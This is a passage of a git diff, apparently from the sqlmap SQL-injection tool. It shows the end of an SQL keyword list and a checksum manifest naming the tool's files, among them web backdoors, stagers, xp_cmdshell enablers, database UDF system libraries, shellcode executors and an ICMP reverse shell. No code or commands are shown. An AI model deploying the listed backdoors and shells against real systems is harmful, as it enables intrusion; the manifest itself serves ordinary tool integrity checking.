+LOCALTIMESTAMP +LOG +LOG10 +LOWER +MATCH +MATCHES +MATCH_NUMBER +MATCH_RECOGNIZE +MAX +MEASURES +MEMBER +MERGE +METHOD +MIN +MINUTE +MOD +MODIFIES +MODULE +MONTH +MULTISET +NATIONAL +NATURAL +NCHAR +NCLOB +NEW +NO +NONE +NORMALIZE +NOT +NOTNULL +NTH_VALUE +NTILE +NULL +NULLIF +NUMERIC +OCCURRENCES_REGEX +OCTET_LENGTH +OF +OFFSET +OLD +OMIT +ON +ONE +ONLY +OPEN +OR +ORDER +OUT +OUTER +OVER +OVERLAPS +OVERLAY +PARAMETER +PARTITION +PATTERN +PER +PERCENT +PERCENTILE_CONT +PERCENTILE_DISC +PERCENT_RANK +PERIOD +PERMUTE +PLACING +PORTION +POSITION +POSITION_REGEX +POWER +PRECEDES +PRECISION +PREPARE +PRIMARY +PROCEDURE +PTF +RANGE +RANK +READS +REAL +RECURSIVE +REF +REFERENCES +REFERENCING +REGR_AVGX +REGR_AVGY +REGR_COUNT +REGR_INTERCEPT +REGR_R2 +REGR_SLOPE +REGR_SXX +REGR_SXY +REGR_SYY +RELEASE +RESULT +RETURN +RETURNING +RETURNS +REVOKE +RIGHT +ROLLBACK +ROLLUP +ROW +ROWS +ROW_NUMBER +RUNNING +SAVEPOINT +SCOPE +SCROLL +SEARCH +SECOND +SEEK +SELECT +SENSITIVE +SESSION_USER +SET +SHOW +SIMILAR +SIN +SINH +SKIP +SMALLINT +SOME +SPECIFIC +SPECIFICTYPE +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQRT +START +STATIC +STDDEV_POP +STDDEV_SAMP +SUBMULTISET +SUBSET +SUBSTRING +SUBSTRING_REGEX +SUCCEEDS +SUM +SYMMETRIC +SYSTEM +SYSTEM_TIME +SYSTEM_USER +TABLE +TABLESAMPLE +TAN +TANH +THEN +TIME +TIMESTAMP +TIMEZONE_HOUR +TIMEZONE_MINUTE +TO +TRAILING +TRANSLATE +TRANSLATE_REGEX +TRANSLATION +TREAT +TRIGGER +TRIM +TRIM_ARRAY +TRUE +TRUNCATE +UESCAPE +UNION +UNIQUE +UNKNOWN +UNMATCHED +UNNEST +UPDATE +UPPER +USER +USING +VALUE +VALUES +VALUE_OF +VARBINARY +VARCHAR +VARIADIC +VARYING +VAR_POP +VAR_SAMP +VERBOSE +VERSIONING +WHEN +WHENEVER +WHERE +WIDTH_BUCKET +WINDOW +WITH +WITHIN +WITHOUT +XML +XMLAGG +XMLATTRIBUTES +XMLBINARY +XMLCAST +XMLCOMMENT +XMLCONCAT +XMLDOCUMENT +XMLELEMENT +XMLEXISTS +XMLFOREST +XMLITERATE +XMLNAMESPACES +XMLPARSE +XMLPI +XMLQUERY +XMLSERIALIZE +XMLTABLE +XMLTEXT +XMLVALIDATE +YEAR + +# Misc + +ORD +MID diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt new file mode 100644 index 00000000000..623d6e697bf --- /dev/null +++ b/data/txt/sha256sums.txt @@ -0,0 +1,637 @@ +e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18 data/procs/mssqlserver/activate_sp_oacreate.sql +6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120 data/procs/mssqlserver/configure_openrowset.sql +798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad data/procs/mssqlserver/configure_xp_cmdshell.sql +5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421 data/procs/mssqlserver/create_new_xp_cmdshell.sql 
+3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0 data/procs/mssqlserver/disable_xp_cmdshell_2000.sql +afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4 data/procs/mssqlserver/dns_request.sql +657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2 data/procs/mssqlserver/enable_xp_cmdshell_2000.sql +1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d data/procs/mssqlserver/run_statement_as_user.sql +9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf data/procs/mysql/dns_request.sql +02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb data/procs/mysql/write_file_limit.sql +02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900 data/procs/oracle/dns_request.sql +606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117 data/procs/oracle/read_file_export_extension.sql +4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb data/procs/postgresql/dns_request.sql +7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137 data/procs/README.txt +519431a555205974e7b12b5ecb8d6fb03a504fbb4a6a410db8874a9bfcff6890 data/shell/backdoors/backdoor.asp_ +fbb0e5456bc80923d0403644371167948cefc8e95c95a98dc845bc6355e3718f data/shell/backdoors/backdoor.aspx_ +01695090da88b7e71172e3b97293196041e452bbb7b2ba9975b4fac7231e00a5 data/shell/backdoors/backdoor.cfm_ +03117933dcc9bfc24098e1e0191195fc4bafb891f0752edee28be1741894e0e5 data/shell/backdoors/backdoor.jsp_ +2505011f6dcf4c1725840ce495c3b3e4172217286f5ce2a0819c7a64ce35d9df data/shell/backdoors/backdoor.php_ +a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64 data/shell/README.txt +a4d49b7c1b43486d21f7d0025174b45e0608f55c110c6e9af8148478daec73d1 data/shell/stagers/stager.asp_ +1b21206f9d35b829fdf9afa17ea5873cd095558f05e644d56b39d560dfa62b6e data/shell/stagers/stager.aspx_ +8a149f77137fc427e397ec2c050e4028d45874234bc40a611a00403799e2dc0b data/shell/stagers/stager.cfm_ +c3a595fc1746ee07dbc0592ba7d5e207e6110954980599f63b8156d1d277f8ca data/shell/stagers/stager.jsp_ +82bcebc46ed3218218665794197625c668598eb7e861dd96e4f731a27b18a701 data/shell/stagers/stager.php_ +eb86f6ad21e597f9283bb4360129ebc717bc8f063d7ab2298f31118275790484 data/txt/common-columns.txt +63ba15f2ba3df6e55600a2749752c82039add43ed61129febd9221eb1115f240 data/txt/common-files.txt +9610fbd4ede776ab60d003c0ea052d68625921a53cdcfa50a4965b0985b619ca data/txt/common-outputs.txt +44047281263ef297f27fdd8fa98a0b0438a25989f897ce184cb0e2e442fb6c11 data/txt/common-tables.txt +ccba96624a0176b4c5acd8824db62a8c6856dafa7d32424807f38efed22a6c29 data/txt/keywords.txt +522cce0327de8a5dfb5ade505e8a23bbd37bcabcbb2993f4f787ccdecf24997e data/txt/smalldict.txt +6c07785ff36482ce798c48cc30ce6954855aadbe3bfac9f132207801a82e2473 data/txt/user-agents.txt +9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6 data/txt/wordlist.tx_ +e3007876d35a153d9a107955fad3f6c338d3733210317b1f359417e8297595aa data/udf/mysql/linux/32/lib_mysqludf_sys.so_ +77f7e7b6cfde4bae8d265f81792c04c4d2b2966328cbf8affb4f980dec2b9d91 data/udf/mysql/linux/64/lib_mysqludf_sys.so_ +52b41ab911f940c22b7490f1d80f920c861e7a6c8c25bb8d3a765fd8af0c34a0 data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ +ea6592dbe61e61f52fd6ab7082722733197fa8f3e6bec0a99ca25aff47c15cff data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ +c58dd9b9fa27df0a730802bd49e36a5a3ccd59611fc1c61b8e85f92e14ac2a88 data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ +b6fdcfcafbbc5da34359604a69aaa9f8459a7e6e319f7b2ee128e762e84d1643 
data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ +8d22d8b06ce253ae711c6a71b4ed98c7ad5ad1001a3dafb30802ec0b9b325013 data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ +812374d50a672a9d07faba1be9a13cfb84a369894dc7c702991382bb9558be9d data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ +5b816a33d9c284e62f1ea707e07b10be5efd99db5762d7bd60c6360dd2e70d8f data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ +cf5b9986fd70f6334bd00e8efcf022571089b8384b650245fb352ec18e48acdf data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ +445c05dac6714a64777892a372b0e3c93eee651162a402658485c48439390ad2 data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ +1c86d2358c20384ac92d333444b955a01ee97f28caac35ed39fdb654d5f93c1b data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ +050ff4692a04dc00b7e6ac187a56be47b5a654ccf907ffa9f9446194763ae7e5 data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ +7806d4c6865c7ebed677ae8abe302ca687c8f9f5b5287b89fed27a36beeeb232 data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ +cfa2a8fc26430cbc11ad0bd37609c753d4ca1eecb0472efe3518185d2d13e7cf data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ +d2210ad9260bd22017acc519a576595306842240f24d8b4899a23228a70f78c6 data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ +6311d919f6ff42c959d0ce3bc6dd5cb782f79f77857e9ab3bd88c2c365e5f303 data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ +4520fc47ea6e0136e03ba9b2eb94161da328f340bf6fbebad39ca82b3b3e323b data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ +bad0bb94ec75b2912d8028f7afdfd70a96c8f86cbc10040c72ece3fd5244660d data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ +b8132a5fe67819ec04dbe4e895addf7e9f111cfe4810a0c94b68002fd48b5deb data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ +03f3b12359a1554705eab46fb04dba63086beb5e2b20f97b108164603efdcb65 data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ +e5be1341a84b1a14c4c648feec02418acb904cd96d7cf0f66ec3ff0c117baf91 data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ +28113b48848ba7d22955a060a989f5ae4f14183b1fc64b67898095610176098c data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ +1187045f66f101c89678791960dc37ca5663cf4190ca7dc550753f028ec61a88 data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ +2259cd7e3f6ff057bbbb6766efc6818a59dbf262bfadefd9fda31746903c7501 data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ +1fdb0856443b56bf9e3e8c7d195171327217af745ad2e299c475d96892a07ec9 data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ +21e274e6c49cc444d689cb34a83497f982ed2b2850cab677dc059aea9e397870 data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ +6707132e4e812ad23cc22ff26e411e89f1eb8379a768161b410202c5442ff3ea data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ +0989c0c0143fb515a12a8b5064f014c633d13a8841aeceaf02ff46901f17805f data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ +3a492e9a1da0799d1107aa5949538303d06409c9a0ed00499626a08083d486ee data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ +3eab7d90606c3c0a9a88e1475e6d8d7d787b3b109c7e188cb9cb8b5561a6766e data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ +a1fe84c5b409366c3926f3138189fb17e7388ef09594a47c9d64e4efe9237a4b data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ +7368a6301369a63e334d829a1d7f6e0b55a824a9f1579dfeb7ced5745994ebc6 data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ +0a6d5fc399e9958477c8a71f63b7c7884567204253e0d2389a240d83ed83f241 data/udf/README.txt 
+288592bbc7115870516865d5a92c2e1d1d54f11a26a86998f8829c13724e2551 data/xml/banner/generic.xml +2adcdd08d2c11a5a23777b10c132164ed9e856f2a4eca2f75e5e9b6615d26a97 data/xml/banner/mssql.xml +14b18da611d4bfad50341df89f893edf47cd09c41c9662e036e817055eaa0cfb data/xml/banner/mysql.xml +6d1ab53eeac4fae6d03b67fb4ada71b915e1446a9c1cc4d82eafc032800a68fd data/xml/banner/oracle.xml +9f4ca1ff145cfbe3c3a903a21bf35f6b06ab8b484dad6b7c09e95262bf6bfa05 data/xml/banner/postgresql.xml +86da6e90d9ccf261568eda26a6455da226c19a42cc7cd211e379cab528ec621e data/xml/banner/server.xml +146887f28e3e19861516bca551e050ce81a1b8d6bb69fd342cc1f19a25849328 data/xml/banner/servlet-engine.xml +8af6b979b6e0a01062dc740ae475ba6be90dc10bb3716a45d28ada56e81f9648 data/xml/banner/set-cookie.xml +a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea data/xml/banner/sharepoint.xml +e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18 data/xml/banner/x-aspnet-version.xml +3a440fbbf8adffbe6f570978e96657da2750c76043f8e88a2c269fe9a190778c data/xml/banner/x-powered-by.xml +0223157364ea212de98190e7c6f46f9d2ee20cf3d17916d1af16e857bb5dc575 data/xml/boundaries.xml +02a7f6d6a0e023c3f087f78ab49cfb99e81df2b42e32718f877d90ab220486dc data/xml/errors.xml +d0b094a110bccec97d50037cc51445191561c0722ec53bf2cebe1521786e2451 data/xml/payloads/boolean_blind.xml +88b8931a6d19af14e44a82408c250ed89295947575bbf3ff3047da1d37d1a1c1 data/xml/payloads/error_based.xml +b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609 data/xml/payloads/inline_query.xml +0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689 data/xml/payloads/stacked_queries.xml +997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1 data/xml/payloads/time_blind.xml +40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089 data/xml/payloads/union_query.xml +a2a2d3f8bf506f27ab0847ad4daa1fc41ca781dd58b70d2d9ac1360cf8151260 data/xml/queries.xml +0f5a9c84cb57809be8759f483c7d05f54847115e715521ac0ecf390c0aa68465 doc/AUTHORS +ce20a4b452f24a97fde7ec9ed816feee12ac148e1fde5f1722772cc866b12740 doc/CHANGELOG.md +c8d5733111c6d1e387904bc14e98815f98f816f6e73f6a664de24c0f1d331d9b doc/THANKS.md +d7e38b213c70fe519fff2e06a9fd0dcfb1d8bed7787e37916cd14faaf002e167 doc/THIRD-PARTY.md +25012296e8484ea04f7d2368ac9bdbcded4e42dbc5e3373d59c2bb3e950be0b8 doc/translations/README-ar-AR.md +c25f7d7f0cc5e13db71994d2b34ada4965e06c87778f1d6c1a103063d25e2c89 doc/translations/README-bg-BG.md +e85c82df1a312d93cd282520388c70ecb48bfe8692644fe8dbbf7d43244cda41 doc/translations/README-bn-BD.md +00b327233fac8016f1d6d7177479ab3af050c1e7f17b0305c9a97ecdb61b82c9 doc/translations/README-ckb-KU.md +f0bd369125459b81ced692ece2fe36c8b042dc007b013c31f2ea8c97b1f95c32 doc/translations/README-de-DE.md +163f1c61258ee701894f381291f8f00a307fe0851ddd45501be51a8ace791b44 doc/translations/README-es-MX.md +70d04bf35b8931c71ad65066bb5664fd48062c05d0461b887fdf3a0a8e0fab1d doc/translations/README-fa-IR.md +a55afae7582937b04bedf11dd13c62d0c87dedae16fcbcbd92f98f04a45c2bdf doc/translations/README-fr-FR.md +f4b8bd6cc8de08188f77a6aa780d913b5828f38ca1d5ef05729270cf39f9a3b8 doc/translations/README-gr-GR.md +bb8ca97c1abf4cf2ba310d858072276b4a731d2d95b461d4d77e1deca7ccbd8e doc/translations/README-hr-HR.md +27ecf8e38762b2ef5a6d48e59a9b4a35d43b91d7497f60027b263091acb067c6 doc/translations/README-id-ID.md +830a33cddd601cb1735ced46bbad1c9fbf1ed8bea1860d9dfa15269ef8b3a11c doc/translations/README-in-HI.md +40fc19ac5e790ee334732dd10fd8bd62be57f2203bd94bbd08e6aa8e154166e2 doc/translations/README-it-IT.md 
+379a338a94762ff485305b79afaa3c97cb92deb4621d9055b75142806d487bf5 doc/translations/README-ja-JP.md +754ce5f3be4c08d5f6ec209cc44168521286ce80f175b9ca95e053b9ec7d14d2 doc/translations/README-ka-GE.md +2e7cda0795eee1ac6f0f36e51ce63a6afedc8bbdfc74895d44a72fd070cf9f17 doc/translations/README-ko-KR.md +c161d366c1fa499e5f80c1b3c0f35e0fdeabf6616b89381d439ed67e80ed97eb doc/translations/README-nl-NL.md +95298c270cc3f493522f2ef145766f6b40487fb8504f51f91bc91b966bb11a7b doc/translations/README-pl-PL.md +b904f2db15eb14d5c276d2050b50afa82da3e60da0089b096ce5ddbf3fdc0741 doc/translations/README-pt-BR.md +3ed5f7eb20f551363eed1dc34806de88871a66fee4d77564192b9056a59d26ec doc/translations/README-rs-RS.md +7d5258bcd281ee620c7143598c18aba03454438c4dc00e7de3f4442d675c2593 doc/translations/README-ru-RU.md +bc15e7db466e42182e4bf063919c105327ff1b0ccd0920bb9315c76641ffd71a doc/translations/README-sk-SK.md +ab7d86319a68392caac23d8d7870d182d31fb8b33b24e84ba77c8119dbd194c2 doc/translations/README-tr-TR.md +5e313398bfe2573c83e25cfc5ff4c003fdbf9244aa611597a7084f7ac11cc405 doc/translations/README-uk-UA.md +c3a53e041ce868b4098c02add27ea3abaf6c9ecf73da61339519708ada6d4f24 doc/translations/README-vi-VN.md +c4590a37dc1372be29b9ba8674b5e12bcda6ab62c5b2d18dab20bcb73a4ffbeb doc/translations/README-zh-CN.md +8c4b528855c2391c91ec1643aeff87cae14246570fd95dac01b3326f505cd26e extra/beep/beep.py +509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9 extra/beep/beep.wav +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/beep/__init__.py +676a764f77109f29c310d7f9424c381516f71944e910efabbc95601af1e49a48 extra/cloak/cloak.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/cloak/__init__.py +6879b01859b2003fbab79c5188fce298264cd00300f9dcecbe1ffd980fe2e128 extra/cloak/README.txt +4b6d44258599f306186a24e99d8648d94b04d85c1f2c2a442b15dc26d862b41e extra/dbgtool/dbgtool.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/dbgtool/__init__.py +a777193f683475c63f0dd3916f86c4b473459640c3278ff921432836bc75c47f extra/dbgtool/README.txt +b7557edb216f65056d359cd48f3191a642cf3a1838a422a67ffbef17b58535d7 extra/icmpsh/icmpsh.exe_ +4838389bf1ceac806dff075e06c5be9c0637425f37c67053a4361a5f1b88a65c extra/icmpsh/icmpsh-m.c +8c38efaaf8974f9d08d9a743a7403eb6ae0a57b536e0d21ccb022f2c55a16016 extra/icmpsh/icmpsh-m.pl +12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733 extra/icmpsh/icmpsh_m.py +6359bfef76fb5c887bb89c2241f6d65647308856f8d3ce3e10bf3fdde605e120 extra/icmpsh/icmpsh-s.c +ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40 extra/icmpsh/__init__.py +27af6b7ec0f689e148875cb62c3acb4399d3814ba79908220b29e354a8eed4b8 extra/icmpsh/README.txt +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/__init__.py +191e3e397b83294082022de178f977f2c59fa99c96e5053375f6c16114d6777e extra/runcmd/README.txt +53d98136e508330e3adad43e4a3b0ebc5143c79f0ee7bce5dacf92cb8f7a17fd extra/runcmd/runcmd.exe_ +70bd8a15e912f06e4ba0bd612a5f19a6b35ed0945b1e370f9b8700b120272d8f extra/runcmd/src/README.txt +baecf66c52fe3c39f7efa3a70f9d5bd6ea8f841abd8da9e6e11bdc80a995b3ae extra/runcmd/src/runcmd/runcmd.cpp +a24d2dc1a5a8688881bea6be358359626d339d4a93ea55e8b756615e3608b8dd extra/runcmd/src/runcmd/runcmd.vcproj +16d4453062ba3806fe6b62745757c66bf44748d25282263fe9ef362487b27db0 extra/runcmd/src/runcmd.sln +d4186cac6e736bdfe64db63aa00395a862b5fe5c78340870f0c79cae05a79e7d extra/runcmd/src/runcmd/stdafx.cpp +e278d40d3121d757c2e1b8cc8192397e5014f663fbf6d80dd1118443d4fc9442 
extra/runcmd/src/runcmd/stdafx.h +38f59734b971d1dc200584936693296aeebef3e43e9e85d6ec3fd6427e5d6b4b extra/shellcodeexec/linux/shellcodeexec.x32_ +b8bcb53372b8c92b27580e5cc97c8aa647e156a439e2306889ef892a51593b17 extra/shellcodeexec/linux/shellcodeexec.x64_ +cfa1f8d02f815c4e8561f6adbdd4e84dda6b6af6c7a0d5eeb9d7346d07e1e7ad extra/shellcodeexec/README.txt +980c03585368a124a085c9f35154f550f945d356ceb845df82b2734e9ad9830b extra/shellcodeexec/windows/shellcodeexec.x32.exe_ +384805687bfe5b9077d90d78183afcbd4690095dfc4cc12b2ed3888f657c753c extra/shutils/autocompletion.sh +a86533e9f9251f51cd3a657d92b19af4ec4282cd6d12a2914e3206b58c964ee0 extra/shutils/blanks.sh +cfd91645763508ba5d639524e1448bac64d4a1a9f2b1cf6faf7a505c97d18b55 extra/shutils/drei.sh +dd5141a5e14a5979b3d4a733016fafe241c875e1adef7bd2179c83ca78f24d26 extra/shutils/duplicates.py +0d5f32aa26b828046b851d3abeb8a5940def01c6b15db051451241435b043e10 extra/shutils/junk.sh +74fe683e94702bef6b8ea8eebb7fc47040e3ef5a03dec756e3cf4504a00c7839 extra/shutils/newlines.py +fed05c468af662ba6ca6885baf8bf85fec1e58f438b3208f3819ad730a75a803 extra/shutils/postcommit-hook.sh +ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/precommit-hook.sh +3893c13c6264dd71842a3d2b3509dd8335484f825b43ed2f14f8161905d1b214 extra/shutils/pycodestyle.sh +0525e3f6004eb340b8a1361072a281f920206626f0c8f6d25e67c8cef7aee78a extra/shutils/pydiatra.sh +763240f767c3d025cefb70dede0598c134ea9a520690944ae16a734e80fd98a0 extra/shutils/pyflakes.sh +d12fd5916e97b2034ba7fbfa8da48f590dc10807119b97a9d27347500c610c2d extra/shutils/pypi.sh +df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh +1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py +9e5e4d3d9acb767412259895a3ee75e1a5f42d0b9923f17605d771db384a6f60 extra/vulnserver/vulnserver.py +b8411d1035bb49b073476404e61e1be7f4c61e205057730e2f7880beadcd5f60 lib/controller/action.py +e376093d4f6e42ee38b050af329179df9c1c136b7667b2f1cb559f5d4b69ebd9 lib/controller/checks.py +430475857a37fd997e73a47d7485c5dd4aa0985ef32c5a46b5e7bff01749ba66 lib/controller/controller.py +56e03690c1b783699c9f30cb2f8cc743d3716aba8137e6b253b21d1dd31a4314 lib/controller/handler.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py +2a96190ced25d8929861b13866101812fcadf5cac23dd1dd4b29b1a915918769 lib/core/agent.py +b13462712ec5ac07541dba98631ddcda279d210b838f363d15ac97a1413b67a2 lib/core/bigarray.py +3b2ca69b7a2e07f6db2fed2651c19e401f62e2068ea3b5f8f96ebf0ff067f349 lib/core/common.py +a6397b10de7ae7c56ed6b0fa3b3c58eb7a9dbede61bf93d786e73258175c981e lib/core/compat.py +a9997e97ebe88e0bf7efcf21e878bc5f62c72348e5aba18f64d6861390a4dcf2 lib/core/convert.py +c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6 lib/core/data.py +ca06a0e9d66a58e74ef994d53f9b3cd2ebaed98735bbab99854054235a8083d6 lib/core/datatype.py +70fb2528e580b22564899595b0dff6b1bc257c6a99d2022ce3996a3d04e68e4e lib/core/decorators.py +147823c37596bd6a56d677697781f34b8d1d1671d5a2518fbc9468d623c6d07d lib/core/defaults.py +6b366f897e66b9df39df2ee45fef77d46efb7a2d4e294440d3aa7dc1b2f4cedf lib/core/dicts.py +a033f92d136c707a25927c2383125ddb004d4283db62c004dcd67c3fc242bb1c lib/core/dump.py +1abf1edeacb85eaf5cffd35fcbde4eee2da6f5fc722a8dc1f9287fb55d138418 lib/core/enums.py +5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py 
+1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py +914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py +02a2264324caa249154e024a01bcd7cc40dbca4d647d5d10a50654b4415a6d77 lib/core/optiondict.py +c1cb56f2a43e9f2f6b25d5f3d504e856ea21df6fc14af5e37b1000feef2bdb5a lib/core/option.py +8171f6ee33e7742f06bb3014a28324496374beddee7b378ace10a26414a97762 lib/core/patch.py +49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py +03db48f02c3d07a047ddb8fe33a757b6238867352d8ddda2a83e4fec09a98d04 lib/core/readlineng.py +48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py +0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py +888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py +1418691b5449412e60c693b6afc2f12b00051c1e280d2261762a36f094e0da66 lib/core/settings.py +cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py +bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py +d35650179816193164a5f177102f18379dfbe6bb6d40fbb67b78d907b41c8038 lib/core/target.py +ddf8c5a3dbebd6cdf8b8ba4417e36652d1e040f025175cb6487f1aebc0208836 lib/core/testing.py +b5b65f018d6ef4b1ceeebbc50d372e07d4733267c9f3f4b13062efd065e847b6 lib/core/threads.py +b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py +10719f5ca450610ad28242017b2d8a77354ca357ffa26948c5f62d20cac29a8b lib/core/update.py +ec11fd5a3f4efd10a1cae288157ac6eb6fb75da4666d76d19f6adf74ac338b5a lib/core/wordlist.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py +54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py +a9f10a558684778bdb00d446cb88967fc1bfd413ae6a5f4bd582b3ea442baa87 lib/parse/cmdline.py +02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py +c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py +5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py +1ad9054cd8476a520d4e2c141085ae45d94519df5c66f25fac41fe7d552ab952 lib/parse/html.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/parse/__init__.py +d2e771cdacef25ee3fdc0e0355b92e7cd1b68f5edc2756ffc19f75d183ba2c73 lib/parse/payloads.py +80d26a30abe948faf817a14f746cc8b3e2341ea8286830cccaae253b8ac0cdff lib/parse/sitemap.py +1be3da334411657461421b8a26a0f2ff28e1af1e28f1e963c6c92768f9b0847c lib/request/basicauthhandler.py +a1c638493ecdc5194db7186bbfed815c6eed2344f2607cac8c9fa50534824266 lib/request/basic.py +bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e lib/request/chunkedhandler.py +2daf0ce19eacda64687f441c90ef8da51714c3e8947c993ba08fb4ecdc4f5287 lib/request/comparison.py +f83140c85be7f572f83c4ab4279fa1d8601243210cdfe4a44b2fc218befbcffd lib/request/connect.py +8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498 lib/request/direct.py +cf019248253a5d7edb7bc474aa020b9e8625d73008a463c56ba2b539d7f2d8ec lib/request/dns.py +f56fc33251bd6214e3a6316c8f843eb192b2996aa84bd4c3e98790fdcf6e8cf0 lib/request/httpshandler.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/request/__init__.py +aeeeb5f0148078e30d52208184042efc3618d3f2e840d7221897aae34315824e lib/request/inject.py +ada4d305d6ce441f79e52ec3f2fc23869ee2fa87c017723e8f3ed0dfa61cdab4 lib/request/methodrequest.py 
